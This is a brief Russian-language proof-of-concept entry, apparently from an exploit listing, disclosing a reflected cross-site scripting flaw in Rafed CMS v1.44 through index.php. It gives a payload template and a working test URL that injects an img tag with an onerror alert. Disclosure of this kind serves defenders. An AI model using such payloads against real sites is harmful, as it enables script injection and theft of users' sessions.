
Эксплойт, подтверждающий концепцию, для отраженной уязвимости межсайтового скриптинга (XSS) в Rafed CMS v1.44 через параметр index.php, позволяющий выполнение произвольного JavaScript.
Rafed CMS Website v1.44 - Межсайтовый скриптинг (XSS)
index.php?">{XSS_Payload] в index.php
https://localhost/?%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E